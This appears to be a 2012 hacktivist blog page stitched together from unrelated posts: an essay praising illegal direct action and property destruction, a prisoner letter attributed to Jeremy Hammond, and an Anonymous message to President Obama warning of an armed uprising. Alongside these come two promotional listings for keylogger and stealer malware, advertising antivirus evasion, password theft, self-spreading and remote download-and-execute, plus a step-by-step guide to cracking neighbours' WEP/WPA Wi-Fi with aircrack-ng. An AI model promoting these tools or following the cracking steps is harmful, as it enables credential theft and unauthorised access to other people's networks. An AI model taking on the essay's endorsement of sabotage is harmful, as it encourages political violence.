Friday, August 3, 2012

A Call for Direct Action


Anyone quick to condemn the antics of radicals needs a history lesson and logical consistency check. Especially amid the current hysteria over war and terrorism, it is easy to forget that the United States won its independence not only by war with England, but also through acts of nonviolent civl disobedience, including property destruction. As dramatically evident in the Boston Tea Party, when in 1773 fifty members of the underground Sons of Liberty group dumped 342 chests of British tea into the Boston Harbor to protest the high tax on tea and the British tyranny in general, the colonies employed sabotage tactics to undermine the power of the british and to galvanize the will of the newly emerging nation. Of this form of “terrorism”, John Adams said, “There is a dignity, a majesty, a sublimity, in this last effort of the patriots, that I greatly admire.”

Not merely an act of senseless demolition, property destruction was and still is a legitimate cry for justice and a powerful means of achieving it. Civil disobedience and sabotage have been key catalysts for many modern radical struggles. As James Goodman succinctly puts it.

“The entire edifice of western liberal democracy - from democratic rights, to representative parliament, to freedom of speech - rests on previous acts of civil disobedience. The American anti-colonialists in the 1770s asserting “no taxation without representation”; the French revolutionaries in the 1780s demanding “liberty, equality, fraternity”; the English Chartists in the 1830s demanding a “People’s Charter”; the Suffragetts of the 1900s demanding “votes for women”; the Gandhian disobedience movement from the 1920s calling for “Swaraj’Vself-government; all of these were movements of civil disobedience, and have shaped the political traditions that we live with today.”

Few things are more American and patriotic than dissent, protest, civil disobedience, and property destruction in the name of freedom and liberation. From the Boston Tea Party to the Underground Railroad, from the Suffragettes to the Civil Rights Movement; From Vietnam War resistance and the Battle of Seattle, to the current Occupy Wall Street and NATO Summit protests, key struggles in US history employed illegal direct action tactics - and sometimes violence- to advance the historical movement toward human rights and freedoms. Rather than being a rupture in some bucolic tradition of Natural Law guiding the Reason of modern citizens to the Good and bringing Justice down to earth in a peaceful and gradual dazzle, the current movements needs to be the continuation of the American culture of rights, democracy, civil disobedience, and direct action, as they expand the struggle to a far broader constituency.

American history has two main political traditions. First, there is the ‘indirect” system of “representative democracy” whereby citizens express their needs and wants to elected local and state officials whose sole function is to “represent” them in the political and legal system. The system’s “output” - laws-  reflects the “input” - the people’s will and interests. This cartoon image of liberal democracy, faithfully reproduced in generation after generation of textbooks and in the discourse of state apologists and the media, is falsified by the fact that powerful economic and political forces co-opt elected officials, who represent the interests of the elite instead of the majority. From the realization that the sate is hardly s neutral arbiter of competing interests but rather exist to advance the interests of economic and political elites, a second political tradition of direct action has emerged.
Direct action advocates argue that the indirect system of representative democracy is irredeemably corrupted by the money, power, cronyism, and privilege. Appealing to the lessons of history, direct activists insist that one cannot win struggles solely through education, moral persuasion, political campaigns, demonstrations, or any form of aboveground, mainstream, or legal action. Direct action movements therefore bypass pre-approved efforts to social power they challenge. Whereas indirect action can promote passivity and dependence on others for change, direct action tends to be more involving and empowering. In the words of Voltairine de Cleyre, “the evil of pinning faith to indirect action is far greater than any such minor results. The main evil is that it destroys initiative, quenches the individual rebellious spirit, teaches people to rely on someone else to do for them what they should do for themselves; finally renders organic the anomalous idea that by massing supineness together until a majority is acquired, then through the peculiar magic of that majority, this supineness is to be transformed into energy. That is, people who have lost the habit of striking for themselves as individuals, who have submitted to every injustice while waiting for the majority to grow, are going to become metamorphosed into human high-explosives by a mere process of packing! People must learn that their power does not lie in their voting strength, that their power lies in their ability to stop production.”

Direct action attics can vary widely, raging from sit-ins, strikes, boycotts, tree sits to hacking Websites, email and phone harassment, home demonstrations, and arson, as well as bombings and murder. Direct action can be legal, as in the case of the civil disobedience tactics of Mohandas Gandhi and Martin Luther King Jr. Illegal direct action, moreover, can be nonviolent or violent, and can respect private property or destroy it.

Opponents of direct action often argue that illegal actions undermine the rule of the law. and they view civil disobedience as a threat to political order. Among other things, this perspective presupposes that the system in question is legitimate or cannot be improved. It misrepresents direct activists as people who lack respect for the principles of law and its relation to ethics and justice than those who fetishize political order for its own sake. Moreover, this argument fails to grasp that many direct action advocates are anarchists who seek to replace the states and legal systems they hold in contempt with the ethical substance of self-regulating decentralized communities. Whatever their approach, champions of direct action renounce uncritical allegiance to a legal system. To paraphrase Karl Marx, the law is the opiate of the people, and the blind obedience to laws and social decorum led German Jews to their death with little resistance. All too often, the legal system simply a byzantine structure designed to absorb opposition and induce paralysis by deferral, delay, and dilution.

Jeremy Hammond, alleged Anonymous hacker

Thanks for everybody coming out in support! It is so good to know folks on the street got my back. Special thanks to those who have been sending books and letters, and to my amazing lawyers.

I remember maybe a few months before I was locked up I went to a few noise demonstrations a the federal jail MCC Chicago in support of all those locked up there. Prisoners moved in front of the windows, turned the lights on and off, and dropped playing cards through the cracks in the windows. I had no idea I would soon be in that same jail facing multiple trumped up computer hacking “conspiracies.”

Now at New York MCC, the other day I was playing chess when another prisoner excitedly cam e up as was like, “Yo, there are like 50 people outside the window and they are carrying banners with your name!” Sure enough, there you all were with lights, banners, and bucket drums just below our 11th floor window. Though you may not have been able to here us or see us, over one hundred of us in this unit saw you all and wanted to know who those people were, what they were about, rejuvenated knowing people on the outside got there back.

As prisoners in this police state – over 2.5 million of us – we are silenced, marginalized, exploited, forgotten, and dehumanized. First we are judged and sentenced by the “justice” system, then treated as second class citizens by mainstream society. But even the warden of MCC New York has in surprising honesty admitted that “the only difference between us officers here and you prisoners is we just haven’t been caught.”

The call us robbers and fraudsters when the big banks get billion dollar bailouts and kick us out of our homes.

They call us gun runners and drug dealers when pharmaceutical corporations and defense contractors profit from trafficking armaments and drugs on a far greater scale.

They call us “terrorists” when NATO and the US military murder millions of innocents around the world and employ drones and torture tactics.

And they call us cyber criminals when they themselves develop viruses to spy on and wage war against infrastructure and populations in other countries.

Yes, I am one of several dozen around the world accused of Anonymous-affiliated computer hacking charges.

One of many here at MCCC New York facing trumped up “conspiracy” charges based on the cooperation of government informants who will say anything and sell out anyone to save themselves.

And this jail is one of several thousand other jails, prisons, and immigrant detention centers – lockups which one day will be reduced to rubble and grass will grow between the cracks of the concrete.

So don’t let fear of imprisonment deter you from speaking up and fighting back. Silencing our movement is exactly what they hope to accomplish with these targeted, politically motivated prosecutions. They can try to stop a few of us but they can never stop us all.

Thanks again for coming out.

Keep bringing the ruckus!

Rapzo Keylogger v 1.5 Public Edition

Rapzo Logger v 1.5 ( Public Edition )

[Image: 92564171.jpg]

" Virus Results By 0/32 "(Paid Host )


Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers

Steler Logs :

[Image: fine2.jpg]

[Image: fineh.jpg]

Who Wanna Change Assembly See This

[Image: asm.gif]

Download Link

Anonymous: To Obama

To the President of The United States Of America.


We would like to ask you, Are you happy with what you have allowed the United States to become? The entire country a war zone, People standing up for their rights and the city governments allowing the brutal beating and arresting the citizens across America. By allowing this to happen you are a disgrace to the presidency. Any past president would put their political careers aside and focus on the city streets of his own country. So far you have done nothing about the thousands of people arrested in the city streets for exorcising their First Amendment rights, because you are too busy campaining for your 2nd term as president. Stop and listen to the people you took an oath to uphold, Stop treating the people of America like terrorists with the building of FEMA camps to house Americans that stand up against political control. Mr. President you had a dream of change when you were first elected but clearly you have sold out to the corporate injustices that every American involved in the Occupy movement are speaking out against. You Mr. President are a FAILURE to AMERICA.

In fact you are building an ARMY, An ARMY of angry AMERICANS that will not allow the government to control every little aspect of their lives. It is only a matter of time before the people of America turn the tables and focus their revolution on True Freedom. And they will fight for it. By allowing the indefinite detention bill to pass you will turn EVERY citizen of America into a soldier, and the people of the United States will seek justice. America is not a war zone but you are going to allow it to become one if you do not address the issues at hand. This is a message that will not be unheard. Mr. President if you pass the indefinite detention bill you will be throwing the United States Constitution out the window, and by doing so will only result in the FAILURE of the United States. There are not enough people in the US armed Forces to stop every American citizen that will be closing in on the government buildings if you do not put the US Constitution FIRST!

By allowing this bill to pass you will make every American citizen ANONYMOUS.

And for that injustice, the people will rise against you and scream " Give me freedom, or give me death "

We are Legion.
We do not forgive.
We do not forget.

Free Keylogger Public Version 1.5

Unknown Logger Public V 1.5


Unknown Logger Public V 1.5 has been developed for Couple of Reasons:
1- Enough with these Not Working Loggers over there...
2- Now you have a Free Logger that works 100 % Sure...
3- New Coders, now you can Learn from the Source and Develop your stuff without asking the help of anybody and without getting flamed; because we know that Mother Fuckers are everywhere...
4- We are also Offering a Full Live Support if you need Anything... Just PM Me and I will get to you as fast as I can....


[Image: nkJaB.png]

[Image: K2twS.png]



1- Built in Stub
2- Get Tons of Information about the slave (Computer User, Computer Name, Computer Total Physical Memory, slave's IP Address, slave's Country, Date, etc...)
3- Send logs to SMTP Severs and FTP
4- SMTP (Hotmail, Gmail, AOL, Yahoo)
5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo)
6- Test FTP Functionality
7- Continuously Send Logs without Fail
8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you)
9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...))
10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit)
11- Hide Functionality (Make the Server Invisible to the Naked eye)
12- Never Crashes in slave's Computer (Will always be working whatever happens)
13- Simple and Easy to use GUI
14- Customer Server Name
15- Sends Clean and Very Organized Logs
16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes


1- USB Spreader
2- LAN Spreader
3- P2P Spreader
4- RAR Spreader


1- Firefox 4/5/6/7/8/9
2- Google Chrome All Versions
3- Opera All Versions
4- Internet Explorer 7/9
5- Steam Stealer
6- CD Keys (up to 300)

Anti Killers:

1- Anti Nod32 (All Versions)
2- Anti Kaspersky (All Versions)
3- Anti BitDefender (All Versions)
4- Anti MalwareBytes (All Versions)
5- Anti Norman (All Versions)
6- Anti WireShark (All Versions)
7- Anti Anubis (All Versions)
8- Anti KeyScrambler (All Versions)
9- Anti Ollydbg (All Versions)
10- Anti Outpost (All Versions)
11- Anti ZoneAlaram (All Versions)


1- Disable RUN
2- Disable Registry
3- Disable CMD
4- Disable Right Click
5- Disable Task Manager
6- Disable System Restore


1- Delete FireFox Cookies
2- Delete Google Chrome Cookies
3- Delete Internet Explorer Cookies

Download And Execute:

Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously

Webpage Loader:

Add any Link and it will be Automatically Loaded on the slave's PC

Fake Message:

Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the slave's Computer

Built Ins:

1- Icon Changer
2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)
3- Assembly Changer

Updates for V 1.5:

1- Logs Sending bug Fixed
2- Firefox Stealer bug fixed
3- Google Chrome Stealer works for All Versions
4- Assembly Changer added
5- Some small bugs has been also fixed.
6- Unknown Logger is now Faster and use Less CPU
7- Unknown Logger created Server is now Faster, use Less CPU and is more stable...
8- Unknown Logger is now more Secured.


1- The Unknown - Coder
2- Speed13 - Coder Assistant (That's my Teacher...)
3- Gogoli - (FF Stealer 4/5 - GC Stealer - Opera Stealer)
4- AeonHack - Theme

Download Link:

Unknown Logger Public V 1.5:

How to hack WiFi WEP WPA WPA2

[Image: 8Ifdn.jpg]

[Image: ePfVI.jpg]
 Welcome to my tutorial about wireless networking. Today I'll be shwoing you how easy it is to get access to a wireless secure network. There are lots of questions coming from the beginners on how to crack WEP/WPA/WPA2 keys and accessing their neighbor's connection. The purpose of this tutorial is to answer them. Judging from the "tutorials" on youtube which are either outdated, or just misguiding the viewers, this tutorial will be unalike. I will be covering all of the parts and ways of hacking a network and gaining access to their router. This tutorial will be separated in 2 parts,  as WEP and WPA/WPA2 hacking. Please read below on what you need to be successful.

[Image: FjkSQ.jpg]
    • Backtrack 5 - I would suggest GNOME, 32Bit, ISO & Direct
    • Compatible Wireless Card
    • WPA Word List - Search via torrents to find one

[Image: V5vKq.jpg]
  • Making a bootable USB
  • WEP encrypted networks
  • WPA/WPA2 encrypted networks
  • Commands Used

[Image: hPqWA.jpg]
    This is the most important step that you need to succeed in before learning how to use backtrack and actually hack WEP/WPA networks. Please follow the easy steps below:
[Image: hLpNX.jpg]
    • Download & Run UNetbootin
    • Tick Diskimage instead of Distribution
    • Select USB Drive as the type, and select your USB drive name - Example: F:\
    • Click OK and wait a couple of minutes - Note: It may freeze at some point, don't worry about that

[Image: T1lHe.jpg]
    What you need for this crack are a few simple things, a copy of backtrack 5 booting off a DVD or a flash drive and a compatible wireless card that supports packet injection. Now if you can't get to this screen, and you are stuck at the terminal you get when booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show. Okay so let's begin, so first we need to open a terminal. To do that, just click the little icon that's on the right side from System. Please see the image below:

    [Image: eYmZR.jpg?2367]

    Now type airmon-ng and that command displays our interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

    [Image: KjZHU.jpg]

    Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

    [Image: WNi8O.jpg]

    Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the network you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.

    [Image: n3XFy.jpg]

    Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let's preform one of the aireplay commands that will boost that data. Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your wi-fi card is supported, you should see Association successful :-), if you don't see that then your card is not supported.

    [Image: GknZt.jpg]

    Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

    [Image: I3GcE.jpg]

    Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap.

    [Image: 7Dno8.jpg]

    And now it will attempt to crack the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X's will be random numbers and/or letters. That's not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659. Just log in to your Windows OS, and connect using that password.

[Image: p79vw.jpg]
    So lets begin. What you will need for this crack is a dictionary file that we are going to use to crack the WPA/WPA2 password. Remember, the bigger the dictionary file is the greater the chance you have in cracking the password. So now you are probably wondering, where do I get a dictionary file? Well, I don't know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.

    To get the file please PM me, I can't risk getting this tutorial taken down. Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
    [Image: KjZHU.jpg]

    Lets type in
    airodump-ng mon0 and this command is going to initiate the scanning process for Wi-Fi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I'm going to attempt to crack the network under the essid SKIDHАCKER. Take a note of the channel, and you want to copy the BSSID for later use.
    [Image: 5KSfa.jpg]

    Now we are going to type in
    airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don't forget to remember what filename you chose, because we are going to need that at the end.
    [Image: 7jSkY.jpg]

    What is needed to crack a WPA or WPA2 key is something called a
    WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake. This means, if there is no one on the network, you can't get a handshake, and you can't crack the WPA network. So how do we know if someone is connected? Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.
    [Image: zoOBy.jpg]

    Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp. Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in
    aireplay-ng -1 0 -a (bssid) mon0. replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don't run the aireplay command a couple of times.
    [Image: 3UU1B.jpg]

    So now that we have a wpa handshake file, we are going to attempt to crack it. Lets stop the scan by pressing
    CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it's directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.
    [Image: rpUMB.jpg]

    If the password is in the wordlist, it will give you a success message and the key in brackets. Happy hacking, hackers!

[Image: Zphi1.jpg]
  • airmon-ng
      This command displays the wireless interfaces.
  • airmon-ng start wlan0
      This command starts monitoring mode on a wi-fi device.
  • airodump-ng mon0
      This command shows all of the wi-fi networks online.
  • airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
      This command specifies the wi-fi device to concentrate to one network.
  • aireplay-ng -1 0 -a (bssid) mon0
      This command kicks off clients that are connected, and gets the handshake.
  • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
      This command boosts the data, when cracking WEP.
  • aircrack-ng -w (dictionary) (wpa handshake)
      This command is used when cracking WPA or WPA2 networks.
  • aircrack-ng (filename)*.cap
      This command is used when cracking WEP networks.

These were the commands I used in the whole guide.